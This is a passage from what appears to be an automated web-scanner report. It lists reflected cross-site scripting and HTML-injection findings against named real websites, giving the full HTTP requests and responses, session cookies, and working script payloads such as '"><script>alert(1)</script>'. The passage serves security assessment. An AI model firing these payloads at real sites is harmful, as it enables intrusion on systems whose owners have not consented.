<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quoteb1a5e"><a>6fbabd2ed7f-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...

2.78. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78f82"><a>e24ed7b784c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quote/78f82"><a>e24ed7b784c?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:26 GMT
Vary: Accept-Encoding
Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quote-78f82"><a>e24ed7b784c" class="section-sites sidebar-none">
...[SNIP]...

2.79. http://www.ciphertex.com/sites/all/modules/ubercart/uc_attribute/uc_attribute.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_attribute/uc_attribute.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64cf"><a>25774fd7546 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercarta64cf"><a>25774fd7546/uc_attribute/uc_attribute.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:19 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercarta64cf"><a>25774fd7546-uc_attribute-uc_attribute.css" class="section-sites sidebar-none">
...[SNIP]...

2.80. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a3eb"><a>6d01f6ced87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9a3eb"><a>6d01f6ced87/all/modules/ubercart/uc_order/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:40 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9a3eb"><a>6d01f6ced87-all-modules-ubercart-uc_order-uc_order.css" class="section-9a3eb">
...[SNIP]...

2.81. http://www.ciphertex.com/sites/all/modules/ubercart/uc_order/uc_order.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_order/uc_order.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c01"><a>0a6bfc45d0a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/34c01"><a>0a6bfc45d0a/uc_order.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10029
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-34c01"><a>0a6bfc45d0a-uc_order.css" class="section-sites sidebar-none">
...[SNIP]...

2.82. http://www.ciphertex.com/sites/all/modules/ubercart/uc_product/uc_product.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/uc_product/uc_product.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37679"><a>cd992addf4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/uc_product37679"><a>cd992addf4/uc_product.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-uc_product37679"><a>cd992addf4-uc_product.css" class="section-sites sidebar-none">
...[SNIP]...

2.83. http://www.ciphertex.com/sites/all/modules/views_accordion/views-accordion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/views_accordion/views-accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac140"><a>ee39bd0a068 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modulesac140"><a>ee39bd0a068/views_accordion/views-accordion.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:32 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modulesac140"><a>ee39bd0a068-views_accordion-views-accordion.css" class="section-sites sidebar-none">
...[SNIP]...

2.84. http://www.ciphertex.com/sites/default/files/banners/fose.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/fose.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84d"><a>7d48320370f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/files2c84d"><a>7d48320370f/banners/fose.jpg?1308766591 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:10 GMT
Vary: Accept-Encoding
Content-Length: 10030
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-files2c84d"><a>7d48320370f-banners-fose.jpg" class="section-sites sidebar-none">
...[SNIP]...

2.85. http://www.ciphertex.com/sites/default/files/banners/super_savings.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/banners/super_savings.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb692"><a>81b6a9dd69a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/default/filesbb692"><a>81b6a9dd69a/banners/super_savings.jpg?1312833278 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:26 GMT
Vary: Accept-Encoding
Content-Length: 10048
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-default-filesbb692"><a>81b6a9dd69a-banners-super_savings.jpg" class="section-sites sidebar-none">
...[SNIP]...

2.86. http://www.ciphertex.com/sites/default/files/hp.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/default/files/hp.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d78c8"><a>08c8f38d311 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitesd78c8"><a>08c8f38d311/default/files/hp.swf HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:45 GMT
Vary: Accept-Encoding
Content-Length: 10020
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitesd78c8"><a>08c8f38d311-default-files-hp.swf" class="section-sitesd78c8">
...[SNIP]...

2.87. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/minnelli/minnelli.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32443"><a>bbdb3da3f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland32443"><a>bbdb3da3f46/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:16 GMT
Vary: Accept-Encoding
Content-Length: 10022
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland32443"><a>bbdb3da3f46-minnelli-minnelli.css" class="section-themes sidebar-none">
...[SNIP]...

2.88. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f99"><a>90e517ca856 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/13f99"><a>90e517ca856/style.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:25 GMT
Vary: Accept-Encoding
Content-Length: 9984
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-13f99"><a>90e517ca856-style.css" class="section-themes sidebar-none">
...[SNIP]...

2.89. http://www.ciphertex.com/themes/garland/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /themes/garland/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9780e"><a>2292d728864 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /themes/garland/style.css9780e"><a>2292d728864?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:18 GMT
Vary: Accept-Encoding
Content-Length: 9998
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-themes-garland-style.css9780e"><a>2292d728864" class="section-themes sidebar-none">
...[SNIP]...

2.90. http://www.fastcompany.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9939"><script>alert(1)</script>44507fb50f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a9939"><script>alert(1)</script>44507fb50f4=1 HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:58 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:09:18 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:17 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1315831757-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www010
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Content-Length: 67722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<link rel="canonical" href="/?a9939"><script>alert(1)</script>44507fb50f4=1" />
...[SNIP]...

2.91. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9a84"-alert(1)-"276e5b2f698 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
